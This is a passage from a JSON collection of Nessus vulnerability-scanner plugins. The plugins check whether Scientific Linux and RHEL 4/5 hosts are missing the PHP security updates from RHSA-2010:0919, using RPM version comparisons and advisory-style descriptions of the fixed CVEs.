script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user\ninput, a remote attacker could use this flaw to inject an arbitrary\nvariable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export()\nfunction implementation. 
If some fatal error occurred during the\nexecution of this function (such as the exhaustion of memory or script\nexecution time limit), part of the function's output was sent to the\nuser as script output, possibly leading to the disclosure of sensitive\ninformation. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in\nthe way the PHP utf8_decode() function decoded partial multi-byte\nsequences for some multi-byte encodings, sending them to output\nwithout them being escaped. An attacker could use these flaws to\nperform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker\ncould possibly use this flaw to predict values returned by the\nfunction, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy\nduring seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw\nto crash the PHP interpreter where a script used fnmatch() on\nuntrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. 
A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAfter installing the updated packages, the httpd daemon must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1011&L=scientific-linux-errata&T=0&P=1564\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a48d3681\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"php-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-devel-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-domxml-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-gd-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-imap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-ldap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-mbstring-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-mysql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-ncurses-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-odbc-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-pear-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-pgsql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-snmp-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"php-xmlrpc-4.3.9-3.31\")) flag++;\n\nif 
(rpm_check(release:\"SL5\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:35:08", "description": "Updated php packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated 
this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user input, a remote attacker could use this flaw to inject an arbitrary variable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function implementation. If some fatal error occurred during the execution of this function (such as the exhaustion of memory or script execution time limit), part of the function's output was sent to the user as script output, possibly leading to the disclosure of sensitive information. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the way the PHP utf8_decode() function decoded partial multi-byte sequences for some multi-byte encodings, sending them to output without them being escaped. An attacker could use these flaws to perform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient entropy to seed the pseudo-random number generator. A remote attacker could possibly use this flaw to predict values returned by the function, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy during seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the length of the pattern argument. A remote attacker could use this flaw to crash the PHP interpreter where a script used fnmatch() on untrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC extension. 
A malicious XML-RPC client or server could use this flaw to crash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain backported patches to resolve these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {}, "published": "2010-11-30T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 : php (RHSA-2010:0919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-domxml", "p-cpe:/a:redhat:enterprise_linux:php-gd", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-pear", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:4.8", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2010-0919.NASL", "href": "https://www.tenable.com/plugins/nessus/50841", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were 
\n# extracted from Red Hat Security Advisory RHSA-2010:0919. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50841);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_bugtraq_id(38430, 38708, 41991, 44605, 44889);\n script_xref(name:\"RHSA\", value:\"2010:0919\");\n\n script_name(english:\"RHEL 4 / 5 : php (RHSA-2010:0919)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user\ninput, a remote attacker could use this flaw to inject an arbitrary\nvariable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export()\nfunction implementation. 
If some fatal error occurred during the\nexecution of this function (such as the exhaustion of memory or script\nexecution time limit), part of the function's output was sent to the\nuser as script output, possibly leading to the disclosure of sensitive\ninformation. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in\nthe way the PHP utf8_decode() function decoded partial multi-byte\nsequences for some multi-byte encodings, sending them to output\nwithout them being escaped. An attacker could use these flaws to\nperform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker\ncould possibly use this flaw to predict values returned by the\nfunction, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy\nduring seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw\nto crash the PHP interpreter where a script used fnmatch() on\nuntrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. 
After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5016\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2531\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0919\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/16\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0919\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"php-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-devel-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-domxml-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-gd-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-imap-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-ldap-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-mbstring-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-mysql-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-ncurses-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-odbc-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-pear-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-pgsql-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-snmp-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", 
reference:\"php-xmlrpc-4.3.9-3.31\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\n\n if 
(rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", 
cpu:\"x86_64\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : 
rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:11:27", "description": "From Red Hat Security Advisory 2010:0919 :\n\nUpdated php packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user input, a remote attacker could use this flaw to inject an arbitrary variable into the PHP session. (CVE-2010-3065)\n\nAn information 